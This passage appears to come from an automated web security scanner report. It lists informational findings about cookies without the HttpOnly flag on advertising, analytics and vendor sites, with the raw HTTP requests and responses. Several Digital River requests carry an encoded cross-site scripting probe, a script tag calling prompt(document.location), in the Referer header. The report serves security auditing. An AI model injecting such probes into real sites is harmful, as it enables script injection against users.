bh="b!!!##!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!#=3M*$!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!#=3M*'!$1:.!!!!#=3!ea!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P"; path=/; expires=Tue, 03-Sep-2013 12:14:09 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 12:14:09 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

10.14. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PRvt=CBJ9xErB5A2iNjAcUBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRimp=1EAC0400-DA40-6323-0309-F71007140101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRca=|AKcV*1774:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcp=|AKcVAA2c:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpl=|Fhqf:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcr=|GSur:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpc=|FhqfGSur:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.15. https://adwords.google.com/um/StartNewLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.16. http://amch.questionmarket.com/adsc/d921286/4/931683/adscout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d921286/4/931683/adscout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Sat, 04 Sep 2010 12:16:20 GMT; path=/; domain=.questionmarket.com
CS1=931683-4-2; expires=Thu, 25 Oct 2012 04:16:21 GMT; path=/; domain=.questionmarket.com
ES=921286-wME{M-$1; expires=Thu, 25-Oct-2012 04:16:21 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.17. http://amch.questionmarket.com/adscgen/dynamiclink.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LP=1315138623; expires=Thu, 08 Sep 2011 16:17:03 GMT; path=/; domain=.questionmarket.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.18. http://api.twitter.com/1/SCMagazineAU/lists/infosec/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/SCMagazineAU/lists/infosec/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guest_id=v1%3A131513903352129097; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 00:23:53 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.19. https://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guest_id=v1%3A131514479476958541; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 01:59:54 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.20. http://apis.google.com/js/plusone.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apis.google.com
Path:	/js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg;Domain=.google.com;Path=/;Expires=Wed, 01-Sep-2021 14:46:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.21. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BMX_BR=pid=p81479006&prad=58778952&arc=40380395&exp=1315138437; expires=Mon 05-Sep-2011 12:13:57 GMT; path=/; domain=.voicefive.com;
ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; expires=Sat 03-Dec-2011 12:13:57 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.22. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; expires=Mon 05-Sep-2011 12:13:37 GMT; path=/; domain=.voicefive.com;
ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; expires=Sat 03-Dec-2011 12:13:37 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.23. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BMX_BR=pid=&prad=&arc=&exp=1315144795; expires=Mon 05-Sep-2011 13:59:55 GMT; path=/; domain=.voicefive.com;
ar_exp=exp=2&initExp=Sun Sep 4 13:56:48 2011&recExp=Sun Sep 4 13:59:55 2011&; expires=Sat 03-Dec-2011 13:59:55 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.24. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1315138425%2E221%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.25. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ar_p82806590=exp=1&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:34 2011&prad=67008633&arc=43678446&; expires=Sat 03-Dec-2011 12:13:34 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1315138414; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.26. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAUW096xXu85Tl6d9LYI4dm0x0ReVYDA3gBY2BgYGRgOnWWgbXPkYHRXZWB4V4eAwODCFDYcPaTU41ANhj4Je1vYGBnYGDZwCjHyMCw8TKjNJBa1gmmNp5jFAPy1nmA5ZYvBVP5YUCDgcYYmaR_UoAYAgB1qxOw; Domain=.amgdgt.com; Expires=Tue, 04-Oct-2011 12:27:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.27. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 12:13:05 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.28. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633"; expires=Tue, 03-Sep-2013 12:17:40 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.29. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9cc29993-80.67.74.150-1314836282; expires=Tue, 03-Sep-2013 12:15:14 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.30. http://b.voicefive.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9cc29993-80.67.74.150-1314836282"; expires=Tue, 03-Sep-2013 12:15:25 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.31. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

u2=7687262b-9a6b-4048-9b55-2203b03ea4123Jl01g; expires=Sat, 03-Dec-2011 08:26:31 GMT; domain=.serving-sys.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.32. http://buy.norton.com/ps_ant_de_de_eset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/ps_ant_de_de_eset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PROGRAMID_CREATED_DATE=09-04-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
FIRSTTIME_CV_DATE=Sep-04-2011 06:56:51; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-04-2011 06:56:51; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-04-2011; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
LASTTIME_CV_DATE=Sep-04-2011 06:59:59; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps_ant_de_de_eset HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.33. http://clk.atdmt.com/MRT/go/341816816/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/MRT/go/341816816/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:903d/15148:7bcf/2b53b; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:da889cf/15148/fa4a3c6/903d/4e6383a6:d76e462/2b53b/145fb5f0/7bcf/4e638463; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/341816816/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.34. http://clk.atdmt.com/go/262448070/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/262448070/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:7bcf/2b53b:903d/15148; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:d76e462/2b53b/145fb5f0/7bcf/4e638463:da889cf/15148/fa4a3c6/903d/4e638463; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/262448070/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.35. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Fri, 14 Aug 2015 02:17:20 GMT
ETag: "1100b-4c65695a"
Content-Type: image/jpeg
Last-Modified: Fri, 13 Aug 2010 15:48:42 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=1864;ecid=23859677534,0)
Content-Length: 69643
Date: Fri, 13 Aug 2010 20:17:20 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app55
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''. ..
. ...................................!! !!''''''''''...........
...[SNIP]...

10.36. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3271688458.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 11 Aug 2016 22:27:40 GMT
ETag: "134-4c6445dc"
Content-Type: image/gif
Last-Modified: Thu, 12 Aug 2010 19:05:00 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2899;ecid=23859678213,0)
Content-Length: 308
Date: Fri, 12 Aug 2011 16:27:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app51
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3271688458.260.0000; path=/

GIF89a................j.....T..r........j..I..........a........u..............;..E...........m..b...........!.......,.............AMi..!~.d..k.....0 .$./.b.....d.al2DEC@".A .'b.(.%.j2...D..B.....@..u
...[SNIP]...

10.37. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Wed, 20 Apr 2016 16:02:03 GMT
ETag: "24ba-4bd96dce"
Content-Type: image/jpeg
Last-Modified: Thu, 29 Apr 2010 11:30:22 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=1864;ecid=23859680367,0)
Content-Length: 9402
Date: Thu, 21 Apr 2011 10:02:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app55
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
...2.......Y..$..........................................................................................................................
...[SNIP]...

10.38. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 11 Aug 2016 00:05:38 GMT
ETag: "15ea-4bd96ddb"
Content-Type: image/jpeg
Last-Modified: Thu, 29 Apr 2010 11:30:35 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=631;ecid=23859681551,0)
Content-Length: 5610
Date: Thu, 11 Aug 2011 18:05:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app56
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; path=/

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
...o.....................................................................................................................................
...[SNIP]...

10.39. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Sun, 14 Feb 2016 05:20:10 GMT
ETag: "3aa-4bd96ed0"
Content-Type: image/gif
Last-Modified: Thu, 29 Apr 2010 11:34:40 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2649;ecid=101169090774,0)
Content-Length: 938
Date: Sun, 13 Feb 2011 23:20:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app57
Accept-Ranges: bytes
